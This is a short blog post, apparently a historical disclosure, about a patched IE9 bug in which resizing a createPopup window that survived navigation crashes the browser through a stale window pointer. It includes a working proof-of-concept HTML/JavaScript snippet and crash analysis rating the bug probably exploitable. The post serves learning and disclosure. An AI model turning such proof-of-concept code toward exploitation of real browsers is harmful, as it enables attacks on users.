IE9 EoP: Crashing the Browser by Resizing a Persistent createPopup

After discovering that persistent createPopup windows survive navigation, I found that trying to resize one manually would crash the browser. The popup shown before the redirect has resize handles drawn around it once it gains focus, and dragging those handles triggers a code path that dereferences a stale window object.

<script language="JavaScript">
function main()
{
    var win = window.open("redir.aspx");

    var cp = win.createPopup();
    cp.document.bgColor = "#fafaca";
    cp.document.body.innerHTML = '<br /><br /><h1>Resize this window by clicking the dots around it.</h1>';

    cp.show(0, 0, 600, 200);
    cp.document.parentWindow.setTimeout("window.focus();", 2000);
}
</script>
<input type="button" size="50" onclick="main()" value="Show resizable createPopup()">

After the redirect completes and the popup has focus, clicking on the resize handles sends window messages through MSHTML!CHTMLPopup::s_WndProc. The message handler tries to read a pointer from [eax+4] in CDoc::OnWindowMessage, but the containing window object has already been invalidated by the navigation. The crash was rated PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Crash: Resizing a createPopup Belonging to a Dead IFrame] :: [UXSS: createElement Cached Reference Survives Redirect] >